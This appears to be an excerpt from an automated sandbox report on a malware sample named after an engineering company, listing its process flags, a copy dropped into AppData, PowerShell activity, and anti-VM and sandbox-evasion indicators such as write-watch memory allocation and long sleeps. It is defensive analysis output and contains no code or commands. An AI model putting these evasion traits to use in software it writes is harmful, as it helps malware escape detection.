Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 5148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RTUZKYTc.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SS Bottmac Engineers Pvt. Ltd..exe PID: 1992, type: MEMORYSTR

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 1760000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 5130000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 9470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: A470000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: A680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: B680000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: BAE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: CAE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: DAE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3140000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 5340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 1240000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 3000000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 1480000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 8CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 9CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 9EB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: AEB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: B340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: C340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: D340000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 1290000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 2C30000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\RTUZKYTc.exe	Memory allocated: 2A50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 1640000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3110000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 2F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 8F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 7AB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 9F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: AF00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: B530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: C530000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: C20000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 2950000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 26C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 1770000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 3500000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 1890000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 9080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 7BF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: A080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: B080000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: B660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: C660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: D660000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: F10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 2B50000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe	Memory allocated: 11B0000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

